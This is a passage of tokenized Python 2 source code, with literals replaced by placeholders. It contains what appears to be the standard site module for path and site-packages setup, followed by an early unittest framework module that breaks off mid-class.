<s> """<STR_LIT>""" <EOL> import sys <EOL> import os <EOL> import __builtin__ <EOL> PREFIXES = [ sys . prefix , sys . exec_prefix ] <EOL> ENABLE_USER_SITE = None <EOL> USER_SITE = None <EOL> USER_BASE = None <EOL> def makepath ( * paths ) : <EOL> dir = os . path . abspath ( os . path . join ( * paths ) ) <EOL> return dir , os . path . normcase ( dir ) <EOL> def abs__file__ ( ) : <EOL> """<STR_LIT>""" <EOL> for m in sys . modules . values ( ) : <EOL> if hasattr ( m , '<STR_LIT>' ) : <EOL> continue <EOL> try : <EOL> m . __file__ = os . path . abspath ( m . __file__ ) <EOL> except AttributeError : <EOL> continue <EOL> def removeduppaths ( ) : <EOL> """<STR_LIT>""" <EOL> L = [ ] <EOL> known_paths = set ( ) <EOL> for dir in sys . path : <EOL> dir , dircase = makepath ( dir ) <EOL> if not dircase in known_paths : <EOL> L . append ( dir ) <EOL> known_paths . add ( dircase ) <EOL> sys . path [ : ] = L <EOL> return known_paths <EOL> def addbuilddir ( ) : <EOL> """<STR_LIT>""" <EOL> from distutils . util import get_platform <EOL> s = "<STR_LIT>" % ( get_platform ( ) , sys . version ) <EOL> if hasattr ( sys , '<STR_LIT>' ) : <EOL> s += '<STR_LIT>' <EOL> s = os . path . join ( os . path . dirname ( sys . path [ - <NUM_LIT:1> ] ) , s ) <EOL> sys . path . append ( s ) <EOL> def _init_pathinfo ( ) : <EOL> """<STR_LIT>""" <EOL> d = set ( ) <EOL> for dir in sys . path : <EOL> try : <EOL> if os . path . isdir ( dir ) : <EOL> dir , dircase = makepath ( dir ) <EOL> d . add ( dircase ) <EOL> except TypeError : <EOL> continue <EOL> return d <EOL> def addpackage ( sitedir , name , known_paths ) : <EOL> """<STR_LIT>""" <EOL> if known_paths is None : <EOL> _init_pathinfo ( ) <EOL> reset = <NUM_LIT:1> <EOL> else : <EOL> reset = <NUM_LIT:0> <EOL> fullname = os . path . join ( sitedir , name ) <EOL> try : <EOL> f = open ( fullname , "<STR_LIT>" ) <EOL> except IOError : <EOL> return <EOL> with f : <EOL> for line in f : <EOL> if line . startswith ( "<STR_LIT:#>" ) : <EOL> continue <EOL> if line . startswith ( ( "<STR_LIT>" , "<STR_LIT>" ) ) : <EOL> exec line <EOL> continue <EOL> line = line . rstrip ( ) <EOL> dir , dircase = makepath ( sitedir , line ) <EOL> if not dircase in known_paths and os . path . exists ( dir ) : <EOL> sys . path . append ( dir ) <EOL> known_paths . add ( dircase ) <EOL> if reset : <EOL> known_paths = None <EOL> return known_paths <EOL> def addsitedir ( sitedir , known_paths = None ) : <EOL> """<STR_LIT>""" <EOL> if known_paths is None : <EOL> known_paths = _init_pathinfo ( ) <EOL> reset = <NUM_LIT:1> <EOL> else : <EOL> reset = <NUM_LIT:0> <EOL> sitedir , sitedircase = makepath ( sitedir ) <EOL> if not sitedircase in known_paths : <EOL> sys . path . append ( sitedir ) <EOL> try : <EOL> names = os . listdir ( sitedir ) <EOL> except os . error : <EOL> return <EOL> dotpth = os . extsep + "<STR_LIT>" <EOL> names = [ name for name in names if name . endswith ( dotpth ) ] <EOL> for name in sorted ( names ) : <EOL> addpackage ( sitedir , name , known_paths ) <EOL> if reset : <EOL> known_paths = None <EOL> return known_paths <EOL> def check_enableusersite ( ) : <EOL> """<STR_LIT>""" <EOL> if sys . flags . no_user_site : <EOL> return False <EOL> if hasattr ( os , "<STR_LIT>" ) and hasattr ( os , "<STR_LIT>" ) : <EOL> if os . geteuid ( ) != os . getuid ( ) : <EOL> return None <EOL> if hasattr ( os , "<STR_LIT>" ) and hasattr ( os , "<STR_LIT>" ) : <EOL> if os . getegid ( ) != os . getgid ( ) : <EOL> return None <EOL> return True <EOL> def addusersitepackages ( known_paths ) : <EOL> """<STR_LIT>""" <EOL> global USER_BASE , USER_SITE , ENABLE_USER_SITE <EOL> env_base = os . environ . get ( "<STR_LIT>" , None ) <EOL> def joinuser ( * args ) : <EOL> return os . path . expanduser ( os . path . join ( * args ) ) <EOL> if os . name == "<STR_LIT>" : <EOL> base = os . environ . get ( "<STR_LIT>" ) or "<STR_LIT>" <EOL> USER_BASE = env_base if env_base else joinuser ( base , "<STR_LIT>" ) <EOL> USER_SITE = os . path . join ( USER_BASE , <EOL> "<STR_LIT>" + sys . version [ <NUM_LIT:0> ] + sys . version [ <NUM_LIT:2> ] , <EOL> "<STR_LIT>" ) <EOL> else : <EOL> USER_BASE = env_base if env_base else joinuser ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> USER_SITE = os . path . join ( USER_BASE , "<STR_LIT>" , <EOL> "<STR_LIT>" + sys . version [ : <NUM_LIT:3> ] , <EOL> "<STR_LIT>" ) <EOL> if ENABLE_USER_SITE and os . path . isdir ( USER_SITE ) : <EOL> addsitedir ( USER_SITE , known_paths ) <EOL> return known_paths <EOL> def addsitepackages ( known_paths ) : <EOL> """<STR_LIT>""" <EOL> sitedirs = [ ] <EOL> seen = [ ] <EOL> for prefix in PREFIXES : <EOL> if not prefix or prefix in seen : <EOL> continue <EOL> seen . append ( prefix ) <EOL> if sys . platform in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> sitedirs . append ( os . path . join ( prefix , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> elif os . sep == '<STR_LIT:/>' : <EOL> sitedirs . append ( os . path . join ( prefix , "<STR_LIT>" , <EOL> "<STR_LIT>" + sys . version [ : <NUM_LIT:3> ] , <EOL> "<STR_LIT>" ) ) <EOL> sitedirs . append ( os . path . join ( prefix , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> else : <EOL> sitedirs . append ( prefix ) <EOL> sitedirs . append ( os . path . join ( prefix , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> if sys . platform == "<STR_LIT>" : <EOL> if '<STR_LIT>' in prefix : <EOL> sitedirs . append ( <EOL> os . path . expanduser ( <EOL> os . path . join ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> sys . version [ : <NUM_LIT:3> ] , "<STR_LIT>" ) ) ) <EOL> for sitedir in sitedirs : <EOL> if os . path . isdir ( sitedir ) : <EOL> addsitedir ( sitedir , known_paths ) <EOL> return known_paths <EOL> def setBEGINLIBPATH ( ) : <EOL> """<STR_LIT>""" <EOL> dllpath = os . path . join ( sys . prefix , "<STR_LIT>" , "<STR_LIT>" ) <EOL> libpath = os . environ [ '<STR_LIT>' ] . split ( '<STR_LIT:;>' ) <EOL> if libpath [ - <NUM_LIT:1> ] : <EOL> libpath . append ( dllpath ) <EOL> else : <EOL> libpath [ - <NUM_LIT:1> ] = dllpath <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT:;>' . join ( libpath ) <EOL> def setquit ( ) : <EOL> """<STR_LIT>""" <EOL> if os . sep == '<STR_LIT::>' : <EOL> eof = '<STR_LIT>' <EOL> elif os . sep == '<STR_LIT:\\>' : <EOL> eof = '<STR_LIT>' <EOL> else : <EOL> eof = '<STR_LIT>' <EOL> class Quitter ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . name , eof ) <EOL> def __call__ ( self , code = None ) : <EOL> try : <EOL> sys . stdin . close ( ) <EOL> except : <EOL> pass <EOL> raise SystemExit ( code ) <EOL> __builtin__ . quit = Quitter ( '<STR_LIT>' ) <EOL> __builtin__ . exit = Quitter ( '<STR_LIT>' ) <EOL> class _Printer ( object ) : <EOL> """<STR_LIT>""" <EOL> MAXLINES = <NUM_LIT> <EOL> def __init__ ( self , name , data , files = ( ) , dirs = ( ) ) : <EOL> self . __name = name <EOL> self . __data = data <EOL> self . __files = files <EOL> self . __dirs = dirs <EOL> self . __lines = None <EOL> def __setup ( self ) : <EOL> if self . __lines : <EOL> return <EOL> data = None <EOL> for dir in self . __dirs : <EOL> for filename in self . __files : <EOL> filename = os . path . join ( dir , filename ) <EOL> try : <EOL> fp = file ( filename , "<STR_LIT>" ) <EOL> data = fp . read ( ) <EOL> fp . close ( ) <EOL> break <EOL> except IOError : <EOL> pass <EOL> if data : <EOL> break <EOL> if not data : <EOL> data = self . __data <EOL> self . __lines = data . split ( '<STR_LIT:\n>' ) <EOL> self . __linecnt = len ( self . __lines ) <EOL> def __repr__ ( self ) : <EOL> self . __setup ( ) <EOL> if len ( self . __lines ) <= self . MAXLINES : <EOL> return "<STR_LIT:\n>" . join ( self . __lines ) <EOL> else : <EOL> return "<STR_LIT>" % ( ( self . __name , ) * <NUM_LIT:2> ) <EOL> def __call__ ( self ) : <EOL> self . __setup ( ) <EOL> prompt = '<STR_LIT>' <EOL> lineno = <NUM_LIT:0> <EOL> while <NUM_LIT:1> : <EOL> try : <EOL> for i in range ( lineno , lineno + self . MAXLINES ) : <EOL> print self . __lines [ i ] <EOL> except IndexError : <EOL> break <EOL> else : <EOL> lineno += self . MAXLINES <EOL> key = None <EOL> while key is None : <EOL> key = raw_input ( prompt ) <EOL> if key not in ( '<STR_LIT>' , '<STR_LIT:q>' ) : <EOL> key = None <EOL> if key == '<STR_LIT:q>' : <EOL> break <EOL> def setcopyright ( ) : <EOL> """<STR_LIT>""" <EOL> __builtin__ . copyright = _Printer ( "<STR_LIT>" , sys . copyright ) <EOL> if sys . platform [ : <NUM_LIT:4> ] == '<STR_LIT>' : <EOL> __builtin__ . credits = _Printer ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> else : <EOL> __builtin__ . credits = _Printer ( "<STR_LIT>" , """<STR_LIT>""" ) <EOL> here = os . path . dirname ( os . __file__ ) <EOL> __builtin__ . license = _Printer ( <EOL> "<STR_LIT>" , "<STR_LIT>" % sys . version , <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ os . path . join ( here , os . pardir ) , here , os . curdir ] ) <EOL> class _Helper ( object ) : <EOL> """<STR_LIT>""" <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" "<STR_LIT>" <EOL> def __call__ ( self , * args , ** kwds ) : <EOL> import pydoc <EOL> return pydoc . help ( * args , ** kwds ) <EOL> def sethelper ( ) : <EOL> __builtin__ . help = _Helper ( ) <EOL> def aliasmbcs ( ) : <EOL> """<STR_LIT>""" <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> import locale , codecs <EOL> enc = locale . getdefaultlocale ( ) [ <NUM_LIT:1> ] <EOL> if enc . startswith ( '<STR_LIT>' ) : <EOL> try : <EOL> codecs . lookup ( enc ) <EOL> except LookupError : <EOL> import encodings <EOL> encodings . _cache [ enc ] = encodings . _unknown <EOL> encodings . aliases . aliases [ enc ] = '<STR_LIT>' <EOL> def setencoding ( ) : <EOL> """<STR_LIT>""" <EOL> encoding = "<STR_LIT:ascii>" <EOL> if <NUM_LIT:0> : <EOL> import locale <EOL> loc = locale . getdefaultlocale ( ) <EOL> if loc [ <NUM_LIT:1> ] : <EOL> encoding = loc [ <NUM_LIT:1> ] <EOL> if <NUM_LIT:0> : <EOL> encoding = "<STR_LIT>" <EOL> if encoding != "<STR_LIT:ascii>" : <EOL> sys . setdefaultencoding ( encoding ) <EOL> def execsitecustomize ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> import sitecustomize <EOL> except ImportError : <EOL> pass <EOL> def execusercustomize ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> import usercustomize <EOL> except ImportError : <EOL> pass <EOL> def main ( ) : <EOL> global ENABLE_USER_SITE <EOL> abs__file__ ( ) <EOL> known_paths = removeduppaths ( ) <EOL> if ( os . name == "<STR_LIT>" and sys . path and <EOL> os . path . basename ( sys . path [ - <NUM_LIT:1> ] ) == "<STR_LIT>" ) : <EOL> addbuilddir ( ) <EOL> if ENABLE_USER_SITE is None : <EOL> ENABLE_USER_SITE = check_enableusersite ( ) <EOL> known_paths = addusersitepackages ( known_paths ) <EOL> known_paths = addsitepackages ( known_paths ) <EOL> if sys . platform == '<STR_LIT>' : <EOL> setBEGINLIBPATH ( ) <EOL> setquit ( ) <EOL> setcopyright ( ) <EOL> sethelper ( ) <EOL> aliasmbcs ( ) <EOL> setencoding ( ) <EOL> execsitecustomize ( ) <EOL> if ENABLE_USER_SITE : <EOL> execusercustomize ( ) <EOL> if hasattr ( sys , "<STR_LIT>" ) : <EOL> del sys . setdefaultencoding <EOL> main ( ) <EOL> def _script ( ) : <EOL> help = """<STR_LIT>""" <EOL> args = sys . argv [ <NUM_LIT:1> : ] <EOL> if not args : <EOL> print "<STR_LIT>" <EOL> for dir in sys . path : <EOL> print "<STR_LIT>" % ( dir , ) <EOL> print "<STR_LIT:]>" <EOL> print "<STR_LIT>" % ( USER_BASE , <EOL> "<STR_LIT>" if os . path . isdir ( USER_BASE ) else "<STR_LIT>" ) <EOL> print "<STR_LIT>" % ( USER_SITE , <EOL> "<STR_LIT>" if os . path . isdir ( USER_SITE ) else "<STR_LIT>" ) <EOL> print "<STR_LIT>" % ENABLE_USER_SITE <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> buffer = [ ] <EOL> if '<STR_LIT>' in args : <EOL> buffer . append ( USER_BASE ) <EOL> if '<STR_LIT>' in args : <EOL> buffer . append ( USER_SITE ) <EOL> if buffer : <EOL> print os . pathsep . join ( buffer ) <EOL> if ENABLE_USER_SITE : <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> elif ENABLE_USER_SITE is False : <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> elif ENABLE_USER_SITE is None : <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> else : <EOL> sys . exit ( <NUM_LIT:3> ) <EOL> else : <EOL> import textwrap <EOL> print textwrap . dedent ( help % ( sys . argv [ <NUM_LIT:0> ] , os . pathsep ) ) <EOL> sys . exit ( <NUM_LIT:10> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> _script ( ) </s>
<s> '''<STR_LIT>''' <EOL> __author__ = "<STR_LIT>" <EOL> __email__ = "<STR_LIT>" <EOL> __version__ = "<STR_LIT>" [ <NUM_LIT:11> : - <NUM_LIT:2> ] <EOL> import time <EOL> import sys <EOL> import traceback <EOL> import os <EOL> import types <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> __all__ . extend ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if sys . version_info [ : <NUM_LIT:2> ] < ( <NUM_LIT:2> , <NUM_LIT:2> ) : <EOL> def isinstance ( obj , clsinfo ) : <EOL> import __builtin__ <EOL> if type ( clsinfo ) in ( tuple , list ) : <EOL> for cls in clsinfo : <EOL> if cls is type : cls = types . ClassType <EOL> if __builtin__ . isinstance ( obj , cls ) : <EOL> return <NUM_LIT:1> <EOL> return <NUM_LIT:0> <EOL> else : return __builtin__ . isinstance ( obj , clsinfo ) <EOL> def _CmpToKey ( mycmp ) : <EOL> '<STR_LIT>' <EOL> class K ( object ) : <EOL> def __init__ ( self , obj ) : <EOL> self . obj = obj <EOL> def __lt__ ( self , other ) : <EOL> return mycmp ( self . obj , other . obj ) == - <NUM_LIT:1> <EOL> return K <EOL> __metaclass__ = type <EOL> def _strclass ( cls ) : <EOL> return "<STR_LIT>" % ( cls . __module__ , cls . __name__ ) <EOL> __unittest = <NUM_LIT:1> <EOL> class TestResult : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . failures = [ ] <EOL> self . errors = [ ] <EOL> self . testsRun = <NUM_LIT:0> <EOL> self . shouldStop = False <EOL> def startTest ( self , test ) : <EOL> "<STR_LIT>" <EOL> self . testsRun = self . testsRun + <NUM_LIT:1> <EOL> def stopTest ( self , test ) : <EOL> "<STR_LIT>" <EOL> pass <EOL> def addError ( self , test , err ) : <EOL> """<STR_LIT>""" <EOL> self . errors . append ( ( test , self . _exc_info_to_string ( err , test ) ) ) <EOL> def addFailure ( self , test , err ) : <EOL> """<STR_LIT>""" <EOL> self . failures . append ( ( test , self . _exc_info_to_string ( err , test ) ) ) <EOL> def addSuccess ( self , test ) : <EOL> "<STR_LIT>" <EOL> pass <EOL> def wasSuccessful ( self ) : <EOL> "<STR_LIT>" <EOL> return len ( self . failures ) == len ( self . errors ) == <NUM_LIT:0> <EOL> def stop ( self ) : <EOL> "<STR_LIT>" <EOL> self . shouldStop = True <EOL> def _exc_info_to_string ( self , err , test ) : <EOL> """<STR_LIT>""" <EOL> exctype , value , tb = err <EOL> while tb and self . _is_relevant_tb_level ( tb ) : <EOL> tb = tb . tb_next <EOL> if exctype is test . failureException : <EOL> length = self . _count_relevant_tb_levels ( tb ) <EOL> return '<STR_LIT>' . join ( traceback . format_exception ( exctype , value , tb , length ) ) <EOL> return '<STR_LIT>' . join ( traceback . format_exception ( exctype , value , tb ) ) <EOL> def _is_relevant_tb_level ( self , tb ) : <EOL> return '<STR_LIT>' in tb . tb_frame . f_globals <EOL> def _count_relevant_tb_levels ( self , tb ) : <EOL> length = <NUM_LIT:0> <EOL> while tb and not self . _is_relevant_tb_level ( tb ) : <EOL> length += <NUM_LIT:1> <EOL> tb = tb . tb_next <EOL> return length <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( _strclass ( self . __class__ ) , self . testsRun , len ( self . errors ) , <EOL> len ( self . failures ) ) <EOL> class TestCase : <EOL> """<STR_LIT>""" <EOL> failureException = AssertionError <EOL> def __init__ ( self , methodName = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . _testMethodName = methodName <EOL> testMethod = getattr ( self , methodName ) <EOL> self . _testMethodDoc = testMethod . __doc__ <EOL> except AttributeError : <EOL> raise ValueError , "<STR_LIT>" % ( self . __class__ , methodName ) <EOL> def setUp ( self ) : <EOL> "<STR_LIT>" <EOL> pass <EOL> def tearDown ( self ) : <EOL> "<STR_LIT>" <EOL> pass <EOL> def countTestCases ( self ) : <EOL> return <NUM_LIT:1> <EOL> def defaultTestResult ( self ) : <EOL> return TestResult ( ) <EOL> def shortDescription ( self ) : <EOL> """<STR_LIT>""" <EOL> doc = self . _testMethodDoc <EOL> return doc and doc . split ( "<STR_LIT:\n>" ) [ <NUM_LIT:0> ] . strip ( ) or None <EOL> def id ( self ) : <EOL> return "<STR_LIT>" % ( _strclass ( self . __class__ ) , self . _testMethodName ) <EOL> def __eq__ ( self , other ) : <EOL> if type ( self ) is not type ( other ) : <EOL> return False <EOL> return self . _testMethodName == other . _testMethodName <EOL> def __ne__ ( self , other ) : <EOL> return not self == other <EOL> def __hash__ ( self ) : <EOL> return hash ( ( type ( self ) , self . _testMethodName ) ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . _testMethodName , _strclass ( self . __class__ ) ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( _strclass ( self . __class__ ) , self . _testMethodName ) <EOL> def run ( self , result = None ) : <EOL> if result is None : result = self . defaultTestResult ( ) <EOL> result . startTest ( self ) <EOL> testMethod = getattr ( self , self . _testMethodName ) <EOL> try : <EOL> try : <EOL> self . setUp ( ) <EOL> except KeyboardInterrupt : <EOL> raise <EOL> except : <EOL> result . addError ( self , self . _exc_info ( ) ) <EOL> return <EOL> ok = False <EOL> try : <EOL> testMethod ( ) <EOL> ok = True <EOL> except self . failureException : <EOL> result . addFailure ( self , self . _exc_info ( ) ) <EOL> except KeyboardInterrupt : <EOL> raise <EOL> except : <EOL> result . addError ( self , self . _exc_info ( ) ) <EOL> try : <EOL> self . tearDown ( ) <EOL> except KeyboardInterrupt : <EOL> raise <EOL> except : <EOL> result . addError ( self , self . _exc_info ( ) ) <EOL> ok = False <EOL> if ok : result . addSuccess ( self ) <EOL> finally : <EOL> result . stopTest ( self ) <EOL> def __call__ ( self , * args , ** kwds ) : <EOL> return self . run ( * args , ** kwds ) <EOL> def debug ( self ) : <EOL> """<STR_LIT>""" <EOL> self . setUp ( ) <EOL> getattr ( self , self . _testMethodName ) ( ) <EOL> self . tearDown ( ) <EOL> def _exc_info ( self ) : <EOL> """<STR_LIT>""" <EOL> return sys . exc_info ( ) <EOL> def fail ( self , msg = None ) : <EOL> """<STR_LIT>""" <EOL> raise self . failureException , msg <EOL> def failIf ( self , expr , msg = None ) : <EOL> "<STR_LIT>" <EOL> if expr : raise self . failureException , msg <EOL> def failUnless ( self , expr , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if not expr : raise self . failureException , msg <EOL> def failUnlessRaises ( self , excClass , callableObj , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> callableObj ( * args , ** kwargs ) <EOL> except excClass : <EOL> return <EOL> else : <EOL> if hasattr ( excClass , '<STR_LIT>' ) : excName = excClass . __name__ <EOL> else : excName = str ( excClass ) <EOL> raise self . failureException , "<STR_LIT>" % excName <EOL> def failUnlessEqual ( self , first , second , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if not first == second : <EOL> raise self . failureException , ( msg or '<STR_LIT>' % ( first , second ) ) <EOL> def failIfEqual ( self , first , second , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if first == second : <EOL> raise self . failureException , ( msg or '<STR_LIT>' % ( first , second ) ) <EOL> def failUnlessAlmostEqual ( self , first , second , places = <NUM_LIT:7> , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if round ( abs ( second - first ) , places ) != <NUM_LIT:0> : <EOL> raise self . failureException , ( msg or '<STR_LIT>' % ( first , second , places ) ) <EOL> def failIfAlmostEqual ( self , first , second , places = <NUM_LIT:7> , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if round ( abs ( second - first ) , places ) == <NUM_LIT:0> : <EOL> raise self . failureException , ( msg or '<STR_LIT>' % ( first , second , places ) ) <EOL> assertEqual = assertEquals = failUnlessEqual <EOL> assertNotEqual = assertNotEquals = failIfEqual <EOL> assertAlmostEqual = assertAlmostEquals = failUnlessAlmostEqual <EOL> assertNotAlmostEqual = assertNotAlmostEquals = failIfAlmostEqual <EOL> assertRaises = failUnlessRaises <EOL> assert_ = assertTrue = failUnless <EOL> assertFalse = failIf <EOL> class TestSuite : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tests = ( ) ) : <EOL> self . _tests = [ ] <EOL> self . addTests ( tests ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( _strclass ( self . __class__ ) , self . _tests ) <EOL> __str__ = __repr__ <EOL> def __eq__ ( self , other ) : <EOL> if type ( self ) is not type ( other ) : <EOL> return False <EOL> return self . _tests == other . _tests <EOL> def __ne__ ( self , other ) : <EOL> return not self == other <EOL> __hash__ = None <EOL> def __iter__ ( self ) : <EOL> return iter ( self . _tests ) <EOL> def countTestCases ( self ) : <EOL> cases = <NUM_LIT:0> <EOL> for test in self . _tests : <EOL> cases += test . countTestCases ( ) <EOL> return cases <EOL> def addTest ( self , test ) : <EOL> if not hasattr ( test , '<STR_LIT>' ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if ( isinstance ( test , ( type , types . ClassType ) ) and <EOL> issubclass ( test , ( TestCase , TestSuite ) ) ) : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . _tests . append ( test ) <EOL> def addTests ( self , tests ) : <EOL> if isinstance ( tests , basestring ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> for test in tests : <EOL> self . addTest ( test ) <EOL> def run ( self , result ) : <EOL> for test in self . _tests : <EOL> if result . shouldStop : <EOL> break <EOL> test ( result ) <EOL> return result <EOL> def __call__ ( self , * args , ** kwds ) : <EOL> return self . run ( * args , ** kwds ) <EOL> def debug ( self ) : <EOL> """<STR_LIT>""" <EOL> for test in self . _tests : test . debug ( ) <EOL> class FunctionTestCase ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , testFunc , setUp = None , tearDown = None , <EOL> description = None ) : <EOL> TestCase . __init__ ( self ) <EOL> self . __setUpFunc = setUp <EOL> self . __tearDownFunc = tearDown <EOL> self . __testFunc = testFunc <EOL> self . __description = description <EOL> def setUp ( self ) : <EOL> if self . __setUpFunc is not None : <EOL> self . __setUpFunc ( ) <EOL> def tearDown ( self ) : <EOL> if self . __tearDownFunc is not None : <EOL> self . __tearDownFunc ( ) <EOL> def runTest ( self ) : <EOL> self . __testFunc ( ) <EOL> def id ( self ) : <EOL> return self . __testFunc . __name__ <EOL> def __eq__ ( self , other ) : <EOL> if type ( self ) is not type ( other ) : <EOL> return False <EOL> return self . __setUpFunc == other . __setUpFunc and self . __tearDownFunc == other . __tearDownFunc and self . __testFunc == other . __testFunc and self . __description == other . __description <EOL> def __ne__ ( self , other ) : <EOL> return not self == other <EOL> def __hash__ ( self ) : <EOL> return hash ( ( type ( self ) , self . __setUpFunc , self . __tearDownFunc , <EOL> self . __testFunc , self . __description ) ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( _strclass ( self . __class__ ) , self . __testFunc . __name__ ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( _strclass ( self . __class__ ) , self . __testFunc ) <EOL> def shortDescription ( self ) : <EOL> if self . __description is not None : return self . __description <EOL> doc = self . __testFunc . __doc__ <EOL> return doc and doc . split ( "<STR_LIT:\n>" ) [ <NUM_LIT:0> ] . strip ( ) or None <EOL> class TestLoader : <EOL> """<STR_LIT>""" <EOL> testMethodPrefix = '<STR_LIT:test>' <EOL> sortTestMethodsUsing = cmp <EOL> suiteClass = TestSuite <EOL> def loadTestsFromTestCase ( self , testCaseClass ) : <EOL> """<STR_LIT>""" <EOL> if issubclass ( testCaseClass , TestSuite ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> testCaseNames = self . getTestCaseNames ( testCaseClass ) <EOL> if not testCaseNames and hasattr ( testCaseClass , '<STR_LIT>' ) : <EOL> testCaseNames = [ '<STR_LIT>' ] <EOL> return self . suiteClass ( map ( testCaseClass , testCaseNames ) ) <EOL> def loadTestsFromModule ( self , module ) : <EOL> """<STR_LIT>""" <EOL> tests = [ ] <EOL> for name in dir ( module ) : <EOL> obj = getattr ( module , name ) <EOL> if ( isinstance ( obj , ( type , types . ClassType ) ) and <EOL> issubclass ( obj , TestCase ) ) : <EOL> tests . append ( self . loadTestsFromTestCase ( obj ) ) <EOL> return self . suiteClass ( tests ) <EOL> def loadTestsFromName ( self , name , module = None ) : <EOL> """<STR_LIT>""" <EOL> parts = name . split ( '<STR_LIT:.>' ) <EOL> if module is None : <EOL> parts_copy = parts [ : ] <EOL> while parts_copy : <EOL> try : <EOL> module = __import__ ( '<STR_LIT:.>' . join ( parts_copy ) ) <EOL> break <EOL> except ImportError : <EOL> del parts_copy [ - <NUM_LIT:1> ] <EOL> if not parts_copy : raise <EOL> parts = parts [ <NUM_LIT:1> : ] <EOL> obj = module <EOL> for part in parts : <EOL> parent , obj = obj , getattr ( obj , part ) <EOL> if type ( obj ) == types . ModuleType : <EOL> return self . loadTestsFromModule ( obj ) <EOL> elif ( isinstance ( obj , ( type , types . ClassType ) ) and <EOL> issubclass ( obj , TestCase ) ) : <EOL> return self . loadTestsFromTestCase ( obj ) <EOL> elif ( type ( obj ) == types . UnboundMethodType and <EOL> isinstance ( parent , ( type , types . ClassType ) ) and <EOL> issubclass ( parent , TestCase ) ) : <EOL> return TestSuite ( [ parent ( obj . __name__ ) ] ) <EOL> elif isinstance ( obj , TestSuite ) : <EOL> return obj <EOL> elif hasattr ( obj , '<STR_LIT>' ) : <EOL> test = obj ( ) <EOL> if isinstance ( test , TestSuite ) : <EOL> return test <EOL> elif isinstance ( test , TestCase ) : <EOL> return TestSuite ( [ test ] ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" % <EOL> ( obj , test ) ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" % obj ) <EOL> def loadTestsFromNames ( self , names , module = None ) : <EOL> """<STR_LIT>""" <EOL> suites = [ self . loadTestsFromName ( name , module ) for name in names ] <EOL> return self . suiteClass ( suites ) <EOL> def getTestCaseNames ( self , testCaseClass ) : <EOL> """<STR_LIT>""" <EOL> def isTestMethod ( attrname , testCaseClass = testCaseClass , prefix = self . testMethodPrefix ) : <EOL> return attrname . startswith ( prefix ) and hasattr ( getattr ( testCaseClass , attrname ) , '<STR_LIT>' ) <EOL> testFnNames = filter ( isTestMethod , dir ( testCaseClass ) ) <EOL> if self . sortTestMethodsUsing : <EOL> testFnNames . sort ( key = _CmpToKey ( self . sortTestMethodsUsing ) ) <EOL> return testFnNames <EOL> defaultTestLoader = TestLoader ( ) <EOL> def _makeLoader ( prefix , sortUsing , suiteClass = None ) : <EOL> loader = TestLoader ( ) <EOL> loader . sortTestMethodsUsing = sortUsing <EOL> loader . testMethodPrefix = prefix <EOL> if suiteClass : loader . suiteClass = suiteClass <EOL> return loader <EOL> def getTestCaseNames ( testCaseClass , prefix , sortUsing = cmp ) : <EOL> return _makeLoader ( prefix , sortUsing ) . getTestCaseNames ( testCaseClass ) <EOL> def makeSuite ( testCaseClass , prefix = '<STR_LIT:test>' , sortUsing = cmp , suiteClass = TestSuite ) : <EOL> return _makeLoader ( prefix , sortUsing , suiteClass ) . loadTestsFromTestCase ( testCaseClass ) <EOL> def findTestCases ( module , prefix = '<STR_LIT:test>' , sortUsing = cmp , suiteClass = TestSuite ) : <EOL> return _makeLoader ( prefix , sortUsing , suiteClass ) . loadTestsFromModule ( module ) <EOL> class _WritelnDecorator : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , stream ) : <EOL> self . stream = stream <EOL> def __getattr__ ( self , attr ) : <EOL> return getattr ( self . stream , attr ) <EOL> def writeln ( self , arg = None ) : <EOL> if arg : self . write ( arg ) <EOL> self . write ( '<STR_LIT:\n>' ) <EOL> class _TextTestResult 